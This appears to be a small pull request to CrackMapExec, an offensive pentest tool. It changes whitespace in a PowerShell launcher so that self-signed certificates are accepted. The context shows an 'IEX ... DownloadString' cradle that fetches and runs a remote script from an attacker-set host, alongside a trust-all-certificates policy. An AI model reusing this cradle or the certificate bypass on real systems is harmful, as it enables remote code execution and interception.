### PR TITLE
accept self-signed certificates.. harder

### DIFF
--- a/cme/helpers/powershell.py
+++ b/cme/helpers/powershell.py
@@ -221,7 +221,7 @@ IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{ps_scri
 
     elif type(scripts) is list:
         launcher = '''
-        add-type @"
+add-type @"
 using System.Net;
 using System.Security.Cryptography.X509Certificates;
 public class TrustAllCertsPolicy : ICertificatePolicy {


### PR DESCRIPTION
modifies the powershell launcher to accept self-signed certificates on windows 2012 server. The original code did not work on my testmachine - It just waited forever for a GET request. 

Please verify this as I have minimal powershell knowledge - I copy pasted this from AndOs' answer here: https://stackoverflow.com/questions/11696944/powershell-v3-invoke-webrequest-https-error 

I think this is the same problem as seen here: https://github.com/byt3bl33d3r/CrackMapExec/issues/104

